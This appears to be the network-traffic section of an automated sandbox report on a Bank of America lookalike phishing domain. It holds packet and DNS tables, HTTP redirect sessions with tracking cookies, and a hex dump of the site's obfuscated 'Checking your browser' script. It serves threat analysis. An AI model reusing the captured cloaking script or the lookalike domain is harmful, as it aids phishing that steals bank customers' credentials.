                                                                                              Jan 15, 2025 19:42:04.492734909 CET44359116188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.493063927 CET59116443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:04.493078947 CET44359116188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.493421078 CET44359116188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.493724108 CET59116443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:04.493784904 CET44359116188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.493906975 CET59116443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:04.535335064 CET44359116188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.701807976 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.701877117 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.702049971 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:42:04.937709093 CET44359116188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.937810898 CET44359116188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.938604116 CET59116443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:04.942029953 CET59116443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:04.942053080 CET44359116188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:04.950756073 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:42:04.950778008 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:42:09.950382948 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:09.950491905 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:09.950598001 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:09.952522993 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:09.952565908 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:10.662774086 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:10.663342953 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:10.663429976 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:10.664556026 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:10.664964914 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:10.665147066 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:10.665199995 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:10.665230989 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:10.665268898 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:10.715409040 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:12.926843882 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:12.927079916 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:12.927172899 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:12.927386045 CET59117443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:12.927437067 CET44359117188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:12.930289030 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:12.930324078 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:12.930419922 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:12.930625916 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:12.930636883 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:13.629533052 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:13.629822969 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:13.629834890 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:13.630960941 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:13.631303072 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:13.631454945 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:13.631490946 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:13.684179068 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:14.009654999 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:14.009776115 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:14.009840965 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:14.010149956 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:14.010164022 CET44359118188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:14.010174036 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:14.010214090 CET59118443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:14.933248043 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:14.933343887 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:14.933473110 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:14.933701038 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:14.933731079 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.625910044 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.626287937 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.626327991 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.626667976 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.627058983 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.627120972 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.627248049 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.667351007 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.960416079 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.961441994 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.961477995 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.961513042 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.961638927 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.961638927 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.962220907 CET59119443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.962243080 CET44359119188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.966092110 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.966187000 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:15.966315031 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.966584921 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:15.966624022 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:16.680912971 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:16.681394100 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:16.681449890 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:16.681771040 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:16.682174921 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:16.682240963 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:16.682363987 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:16.723330021 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:17.018598080 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:17.019638062 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:17.019697905 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:17.019839048 CET44359120188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:17.019865990 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:17.019865990 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:17.019943953 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:17.020404100 CET59120443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:17.020443916 CET44359120188.119.66.154192.168.2.16
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 15, 2025 19:41:46.638890982 CET5364720162.159.36.2192.168.2.16
                                                                                              Jan 15, 2025 19:41:47.139359951 CET6464753192.168.2.161.1.1.1
                                                                                              Jan 15, 2025 19:41:47.146655083 CET53646471.1.1.1192.168.2.16
                                                                                              Jan 15, 2025 19:41:47.984241962 CET5271853192.168.2.161.1.1.1
                                                                                              Jan 15, 2025 19:41:50.674603939 CET5460553192.168.2.161.1.1.1
                                                                                              Jan 15, 2025 19:41:50.787368059 CET53546051.1.1.1192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.138434887 CET6513853192.168.2.161.1.1.1
                                                                                              Jan 15, 2025 19:41:54.145255089 CET53651381.1.1.1192.168.2.16
                                                                                              Jan 15, 2025 19:42:23.153105974 CET138138192.168.2.16192.168.2.255
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jan 15, 2025 19:41:47.139359951 CET192.168.2.161.1.1.10xb4b4Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:47.984241962 CET192.168.2.161.1.1.10xe552Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:50.674603939 CET192.168.2.161.1.1.10x2ffbStandard query (0)online.access.secure.bankofamerlica.comA (IP address)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:54.138434887 CET192.168.2.161.1.1.10xad71Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jan 15, 2025 19:41:21.790437937 CET1.1.1.1192.168.2.160x9fe9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:21.790437937 CET1.1.1.1192.168.2.160x9fe9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:47.146655083 CET1.1.1.1192.168.2.160xb4b4Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:47.992108107 CET1.1.1.1192.168.2.160xe552No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:48.690973997 CET1.1.1.1192.168.2.160x4bdNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:48.690973997 CET1.1.1.1192.168.2.160x4bdNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:50.787368059 CET1.1.1.1192.168.2.160x2ffbNo error (0)online.access.secure.bankofamerlica.com188.119.66.154A (IP address)IN (0x0001)false
                                                                                              Jan 15, 2025 19:41:54.145255089 CET1.1.1.1192.168.2.160xad71No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                              • https:
                                                                                                • online.access.secure.bankofamerlica.com
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.1659066188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:51 UTC743OUTGET /?ref=9854tjwe46 HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-Dest: document
                                                                                              Referer: https://confirmationonline.blob.core.windows.net/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2025-01-15 18:41:51 UTC604INHTTP/1.1 302 See Other
                                                                                              Date: Wed, 15 Jan 2025 18:41:51 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Set-Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Set-Cookie: ref=9854tjwe46; expires=Wed, 15-Jan-2025 19:41:51 GMT; Max-Age=3600; path=/
                                                                                              Set-Cookie: referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; expires=Wed, 15-Jan-2025 19:41:51 GMT; Max-Age=3600; path=/
                                                                                              Location: secure/
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.1659067188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:51 UTC879OUTGET /secure/ HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-Dest: document
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Referer: https://confirmationonline.blob.core.windows.net/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; ref=9854tjwe46; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
                                                                                              2025-01-15 18:41:52 UTC276INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:51 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 09 Feb 2024 14:04:00 GMT
                                                                                              ETag: "26be6-610f36651d400"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 158694
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e
                                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en"> <head> <title>Checking your browser...</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 63 6d 30 6e 4c 43 64 69 63 6d 39 33 63 32 56 79 54 47 46 75 5a 33 56 68 5a 32 55 6e 4c 43 64 72 62 6d 56 6c 4a 79 77 6e 64 6d 46 73 64 57 55 6e 4c 43 64 74 63 31 64 79 61 58 52 6c 55 48 4a 76 5a 6d 6c 73 5a 58 4a 4e 59 58 4a 72 4a 79 77 6e 62 47 39 6e 4d 54 41 6e 4c 43 63 6a 62 57 56 30 5a 57 39 79 5a 57 52 66 63 32 68 68 63 6d 55 6e 4c 43 64 7a 64 57 5a 6d 61 58 68 6c 63 79 63 73 4a 31 6c 57 64 47 39 6a 62 56 5a 74 57 47 6f 77 61 57 46 49 55 6a 42 6a 52 47 39 32 54 44 4a 47 61 32 52 74 4d 57 68 69 62 55 5a 75 57 6c 68 4a 64 57 52 48 56 6d 70 68 52 31 6f 78 59 6d 6b 31 64 32 4a 44 4f 58 6c 61 56 31 4a 77 59 32 31 57 61 6d 52 44 4f 47 6c 59 55 54 30 39 4a 79 77 6e 63 47 46 79 5a 57 35 30 54 6d 39 6b 5a 53 63 73 4a 33 56 6a 64 32 56 69 4a 79 77 6e 64 32 6c
                                                                                              Data Ascii: cm0nLCdicm93c2VyTGFuZ3VhZ2UnLCdrbmVlJywndmFsdWUnLCdtc1dyaXRlUHJvZmlsZXJNYXJrJywnbG9nMTAnLCcjbWV0ZW9yZWRfc2hhcmUnLCdzdWZmaXhlcycsJ1lWdG9jbVZtWGowaWFIUjBjRG92TDJGa2RtMWhibUZuWlhJdWRHVmphR1oxYmk1d2JDOXlaV1JwY21WamRDOGlYUT09JywncGFyZW50Tm9kZScsJ3Vjd2ViJywnd2l
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 4d 48 67 78 4e 44 51 31 4e 6d 4a 62 4d 48 67 78 58 54 31 66 4d 48 67 79 4e 44 63 30 4e 44 45 38 50 46 38 77 65 44 4e 68 4e 6d 55 78 59 6e 78 66 4d 48 67 78 4e 44 51 31 4e 6d 4a 62 4d 48 67 78 58 54 34 2b 50 6a 42 34 4d 6a 41 74 58 7a 42 34 4d 32 45 32 5a 54 46 69 4b 54 74 39 5a 6e 56 75 59 33 52 70 62 32 34 67 65 53 68 66 4d 48 67 78 4f 57 59 35 4d 57 51 73 58 7a 42 34 59 54 46 6a 4e 47 55 33 4b 58 73 77 65 44 41 68 50 54 30 6f 58 7a 42 34 59 54 46 6a 4e 47 55 33 4a 54 30 77 65 44 51 77 4b 53 59 6d 4b 46 38 77 65 47 45 78 59 7a 52 6c 4e 7a 77 77 65 44 49 77 50 79 68 66 4d 48 67 78 4f 57 59 35 4d 57 52 62 4d 48 67 77 58 54 31 66 4d 48 67 78 4f 57 59 35 4d 57 52 62 4d 48 67 78 58 54 34 2b 50 6a 42 34 4d 6a 41 74 58 7a 42 34 59 54 46 6a 4e 47 55 33 4c 46 38
                                                                                              Data Ascii: MHgxNDQ1NmJbMHgxXT1fMHgyNDc0NDE8PF8weDNhNmUxYnxfMHgxNDQ1NmJbMHgxXT4+PjB4MjAtXzB4M2E2ZTFiKTt9ZnVuY3Rpb24geShfMHgxOWY5MWQsXzB4YTFjNGU3KXsweDAhPT0oXzB4YTFjNGU3JT0weDQwKSYmKF8weGExYzRlNzwweDIwPyhfMHgxOWY5MWRbMHgwXT1fMHgxOWY5MWRbMHgxXT4+PjB4MjAtXzB4YTFjNGU3LF8
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 66 54 74 66 4d 48 67 7a 4d 6a 55 31 4d 32 4d 6f 4b 54 74 39 4b 56 30 37 59 32 46 7a 5a 53 41 77 65 44 55 36 58 7a 42 34 4e 47 52 6d 4e 7a 4d 31 57 79 64 7a 5a 57 35 30 4a 31 30 6f 4b 53 78 66 4d 48 67 30 5a 47 59 33 4d 7a 56 62 4a 32 78 68 59 6d 56 73 4a 31 30 39 4d 48 67 32 4f 32 4e 68 63 32 55 67 4d 48 67 32 4f 6e 4a 6c 64 48 56 79 62 69 68 75 64 57 78 73 50 54 30 39 4b 46 38 77 65 44 63 32 4d 32 55 77 4d 44 31 75 64 57 78 73 50 54 30 39 4b 46 38 77 65 44 4d 78 4e 7a 49 79 5a 54 31 66 4d 48 67 78 4d 6d 52 6c 59 7a 6c 62 58 7a 42 34 4d 6a 4e 6b 5a 57 46 6a 4b 44 42 34 4d 6d 4d 30 4b 56 30 70 66 48 78 32 62 32 6c 6b 49 44 42 34 4d 44 30 39 50 56 38 77 65 44 4d 78 4e 7a 49 79 5a 54 39 32 62 32 6c 6b 49 44 42 34 4d 44 70 66 4d 48 67 7a 4d 54 63 79 4d 6d 56
                                                                                              Data Ascii: fTtfMHgzMjU1M2MoKTt9KV07Y2FzZSAweDU6XzB4NGRmNzM1WydzZW50J10oKSxfMHg0ZGY3MzVbJ2xhYmVsJ109MHg2O2Nhc2UgMHg2OnJldHVybihudWxsPT09KF8weDc2M2UwMD1udWxsPT09KF8weDMxNzIyZT1fMHgxMmRlYzlbXzB4MjNkZWFjKDB4MmM0KV0pfHx2b2lkIDB4MD09PV8weDMxNzIyZT92b2lkIDB4MDpfMHgzMTcyMmV
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 50 31 73 77 65 44 51 73 4b 46 38 77 65 44 46 6a 4e 54 42 69 59 54 31 6b 62 32 4e 31 62 57 56 75 64 43 77 6f 58 7a 42 34 4d 57 4d 31 4d 47 4a 68 57 31 38 77 65 44 4d 34 4d 54 4d 32 5a 53 67 77 65 44 4d 33 4f 43 6c 64 66 48 78 66 4d 48 67 78 59 7a 55 77 59 6d 46 62 4a 32 31 7a 52 58 68 70 64 45 5a 31 62 47 78 7a 59 33 4a 6c 5a 57 34 6e 58 58 78 38 58 7a 42 34 4d 57 4d 31 4d 47 4a 68 57 31 38 77 65 44 4d 34 4d 54 4d 32 5a 53 67 77 65 44 49 30 5a 53 6c 64 66 48 78 66 4d 48 67 78 59 7a 55 77 59 6d 46 62 58 7a 42 34 4d 7a 67 78 4d 7a 5a 6c 4b 44 42 34 4d 7a 63 32 4b 56 30 70 57 31 38 77 65 44 4d 34 4d 54 4d 32 5a 53 67 77 65 44 4e 6c 4f 53 6c 64 4b 46 38 77 65 44 46 6a 4e 54 42 69 59 53 6b 70 58 54 70 62 4d 48 67 7a 4c 44 42 34 4d 6c 30 36 57 7a 42 34 4d 79 77
                                                                                              Data Ascii: P1sweDQsKF8weDFjNTBiYT1kb2N1bWVudCwoXzB4MWM1MGJhW18weDM4MTM2ZSgweDM3OCldfHxfMHgxYzUwYmFbJ21zRXhpdEZ1bGxzY3JlZW4nXXx8XzB4MWM1MGJhW18weDM4MTM2ZSgweDI0ZSldfHxfMHgxYzUwYmFbXzB4MzgxMzZlKDB4Mzc2KV0pW18weDM4MTM2ZSgweDNlOSldKF8weDFjNTBiYSkpXTpbMHgzLDB4Ml06WzB4Myw
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 4d 6d 59 32 4b 53 78 66 4d 48 67 31 59 54 67 32 4e 44 51 6f 4d 48 67 7a 59 32 51 70 4c 46 38 77 65 44 56 68 4f 44 59 30 4e 43 67 77 65 44 4a 6a 59 79 6b 73 58 7a 42 34 4e 57 45 34 4e 6a 51 30 4b 44 42 34 4d 57 5a 6b 4b 53 78 66 4d 48 67 31 59 54 67 32 4e 44 51 6f 4d 48 67 79 4d 44 51 70 58 53 77 6e 5a 6d 46 75 59 6d 39 35 55 32 39 6a 61 57 46 73 4a 7a 70 62 58 7a 42 34 4e 57 45 34 4e 6a 51 30 4b 44 42 34 4d 6a 56 6c 4b 53 78 66 4d 48 67 31 59 54 67 32 4e 44 51 6f 4d 48 67 79 4d 57 51 70 4c 46 38 77 65 44 56 68 4f 44 59 30 4e 43 67 77 65 44 4d 77 5a 69 6b 73 58 7a 42 34 4e 57 45 34 4e 6a 51 30 4b 44 42 34 4d 6a 6c 6b 4b 53 77 6e 4c 6d 4e 76 62 57 31 31 62 6d 6c 30 65 56 39 66 63 32 39 6a 61 57 46 73 4c 57 52 6c 63 32 4d 6e 58 53 77 6e 5a 6e 4a 6c 62 47 78
                                                                                              Data Ascii: MmY2KSxfMHg1YTg2NDQoMHgzY2QpLF8weDVhODY0NCgweDJjYyksXzB4NWE4NjQ0KDB4MWZkKSxfMHg1YTg2NDQoMHgyMDQpXSwnZmFuYm95U29jaWFsJzpbXzB4NWE4NjQ0KDB4MjVlKSxfMHg1YTg2NDQoMHgyMWQpLF8weDVhODY0NCgweDMwZiksXzB4NWE4NjQ0KDB4MjlkKSwnLmNvbW11bml0eV9fc29jaWFsLWRlc2MnXSwnZnJlbGx
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 61 57 39 75 4a 7a 70 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 33 5a 68 63 69 42 66 4d 48 67 78 59 32 52 6d 4d 47 55 39 58 7a 42 34 4d 32 5a 6b 4e 6a 6b 77 4f 33 4a 6c 64 48 56 79 62 69 45 68 5a 47 55 6f 58 7a 42 34 4d 57 4e 6b 5a 6a 42 6c 4b 44 42 34 4d 32 4e 6c 4b 53 6c 38 66 43 46 6b 5a 53 68 66 4d 48 67 78 59 32 52 6d 4d 47 55 6f 4d 48 67 79 4d 7a 4d 70 4b 53 59 6d 64 6d 39 70 5a 43 41 77 65 44 41 37 66 53 77 6e 63 6d 56 6b 64 57 4e 6c 5a 46 52 79 59 57 35 7a 63 47 46 79 5a 57 35 6a 65 53 63 36 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 32 59 58 49 67 58 7a 42 34 4e 54 63 31 5a 54 51 7a 50 56 38 77 65 44 4e 6d 5a 44 59 35 4d 44 74 79 5a 58 52 31 63 6d 34 68 49 57 5a 6c 4b 46 38 77 65 44 55 33 4e 57 55 30 4d 79 67 77 65 44 4e 6a 5a 53 6b 70 66 48 77
                                                                                              Data Ascii: aW9uJzpmdW5jdGlvbigpe3ZhciBfMHgxY2RmMGU9XzB4M2ZkNjkwO3JldHVybiEhZGUoXzB4MWNkZjBlKDB4M2NlKSl8fCFkZShfMHgxY2RmMGUoMHgyMzMpKSYmdm9pZCAweDA7fSwncmVkdWNlZFRyYW5zcGFyZW5jeSc6ZnVuY3Rpb24oKXt2YXIgXzB4NTc1ZTQzPV8weDNmZDY5MDtyZXR1cm4hIWZlKF8weDU3NWU0MygweDNjZSkpfHw
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 67 31 4b 79 31 77 59 58 4a 7a 5a 55 6c 75 64 43 68 66 4d 48 67 78 4e 6d 55 30 5a 44 63 6f 4d 48 68 69 4e 69 6b 70 4c 7a 42 34 4e 69 6f 6f 4c 58 42 68 63 6e 4e 6c 53 57 35 30 4b 46 38 77 65 44 45 32 5a 54 52 6b 4e 79 67 77 65 44 6b 33 4b 53 6b 76 4d 48 67 33 4b 53 74 77 59 58 4a 7a 5a 55 6c 75 64 43 68 66 4d 48 67 78 4e 6d 55 30 5a 44 63 6f 4d 48 67 78 4e 44 45 70 4b 53 38 77 65 44 67 72 63 47 46 79 63 32 56 4a 62 6e 51 6f 58 7a 42 34 4d 54 5a 6c 4e 47 51 33 4b 44 42 34 4d 54 41 77 4b 53 6b 76 4d 48 67 35 4b 69 67 74 63 47 46 79 63 32 56 4a 62 6e 51 6f 58 7a 42 34 4d 54 5a 6c 4e 47 51 33 4b 44 42 34 59 32 49 70 4b 53 38 77 65 47 45 70 4f 32 6c 6d 4b 46 38 77 65 44 4e 6d 4d 57 4a 68 5a 44 30 39 50 56 38 77 65 44 4e 6b 4f 44 63 79 59 53 6c 69 63 6d 56 68 61
